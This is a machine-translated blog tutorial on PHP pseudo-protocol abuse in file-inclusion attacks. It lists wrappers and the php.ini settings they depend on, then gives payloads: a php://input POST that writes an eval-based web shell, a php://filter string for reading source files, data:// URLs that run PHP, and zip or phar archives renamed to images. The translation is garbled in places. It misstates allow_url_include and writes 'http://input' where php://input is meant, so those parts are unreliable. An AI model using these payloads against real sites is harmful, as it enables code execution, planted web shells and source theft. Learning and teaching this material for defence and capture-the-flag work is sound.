当前位置:网站首页>[PHP pseudo protocol] source code reading, file reading and writing, and arbitrary PHP command execution

[PHP pseudo protocol] source code reading, file reading and writing, and arbitrary PHP command execution

2022-07-25 17:09:00 Black zone (rise)

Catalog

One 、 brief introduction

1.1、 summary :

1.2、12 individual php Supported pseudo protocols

1.3、 Premise :

Two 、 Example

2.1、file:// 

Premise :

usage :

2.2、php:// agreement

Premise :

php://input

php://filter

2.3、data://

Premise :

brief introduction :

usage :

Example :

2.4、phar://、zip://、bzip2://、zlib://

brief introduction :

Premise :

usage :

Example :

One 、 brief introduction

1.1、 summary :

PHP Fake protocol yes PHP Supported protocols and encapsulation protocols , These protocols can be used to complete the execution of many commands

1.2、12 individual php Supported pseudo protocols 

file://         Access local file system 
http://         visit  HTTP(s)  website 
ftp://          visit  FTP(s) URLs
php://          Access individual inputs / Output stream (I/O streams)
zlib://         Compressed flow 
data://         data (RFC 2397)
glob://         Find matching file path patterns 
phar://        PHP  file 
ssh2://        Secure Shell 2
rar://         RAR
ogg://          Audio stream 
expect://       Handling interactive flows

1.3、 Premise :

php.ini There are two parameters

allow_url_fopen: allow url Encapsulation protocol access file in ( Default ON)

allow_url_include: Inclusion is not allowed url The encapsulation protocol in contains files ( Default OFF)

Two 、 Example

2.1、file:// 

Premise :

allow_url_fopen:off/on  

allow_url_include :off/on

That is to say, I will not accept allow_url_fopen And allow_url_include Influence

usage :

file:// File absolute path

?file=file://D:/xxxx/1.txt

file= Relative paths

?file=./1.txt

file= URL path

?file=http://127.0.0.1/1.txt

2.2、php:// agreement

Premise :

allow_url_fopen:off/on  

allow_url_include : open on There are php://input php://stdin php://memory php://temp

agreement Introduce
php://input

1、 Read only stream that can access the requested raw data , stay POST Access in request POST Of data part

2、 stay enctype="multipart/form-data" When php://input It's invalid

php://output Write only data streams , Allow to use print and echo Write to the output buffer in the same way
php://fd(>=5.3.6) Allows direct access to the specified file descriptor
php://memory php://temp

1、(>=5.1.0) A data stream similar to a file wrapper , Allow reading and writing temporary data

2、 The only difference between the two is php://memory Always store data in memory , and php://temp After the amount of memory reaches the predefined limit ( The default is 2MB) Save in temporary file . Decision and of temporary file location sys_get_temp_dir() In the same way .

php://filter

1、(>=5.0.0) A meta wrapper , Designed for filtering applications when data flow is open

2、 For all-in-one (all-in-one) The file function of is very useful , similar readfile()、file() and file_get_contents(), There is no chance to apply other filters before the data stream content is read .

php://input

allow_url_fopen=on and allow_url_include=on

POST Submit PHP Code , Cause arbitrary code execution , Such as writing files ( Trojan horse )

php://input + [POST DATA]

eg:

URL in :……?file=http://input

POST in :<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST['123'])?>');?>

php://filter

Read the file source code

php://filter The source code of the specified file can be obtained , If you reuse the inclusion function vulnerability ,php://filter Flow will be treated as php File execution , It is generally coded , Keep it from being executed , Decode after obtaining the encoding , So as to achieve the reading of any file

……?file=php://filter/read=convert.base64-encode/resource= File path

2.3、data://

Premise :

allow_url_fopen:on

allow_url_include :on

brief introduction :

Data flow wrapper , To transfer data in the corresponding format

It can be used to execute PHP Code

usage :

data://text/plain, Content

data://text/plain;base64,base64 Encrypted content

Example :

……?file=data://text/plain,<?php%20phpinfo();?>

……?file=data://text/plain;base64,base64 Encrypted content

2.4、phar://、zip://、bzip2://、zlib://

brief introduction :

Used to read compressed files , You can access sub files in a compressed file , More importantly, you don't need to specify a suffix , Can be modified to any suffix

Premise :

allow_url_fopen:off/on

allow_url_include :off/on

usage :

phar://[ Compressed file path ]/[ The name of the sub file in the compressed file ]

zip://[ Compressed file absolute path ]%23[ The name of the sub file in the compressed file ](%23 by #)

compress.bzip2://file.bz2

Example :

1、 take php Add files to compressed files (phar)

……?file=phar://D:/……1.zip/1.php

2、 take php Add files to 1.zip in , And will 1.zip Rename it to 1.jpg, Then upload to the target server (zip)

……?file=zip://D:/……1.jpg%231.php

3、 Compress 1.php by 1.bz2(bzip2)

……?file=compress.bzip2://D:/……1.bz2

原网站

版权声明
本文为[Black zone (rise)]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/206/202207251708314326.html

边栏推荐

猜你喜欢

随机推荐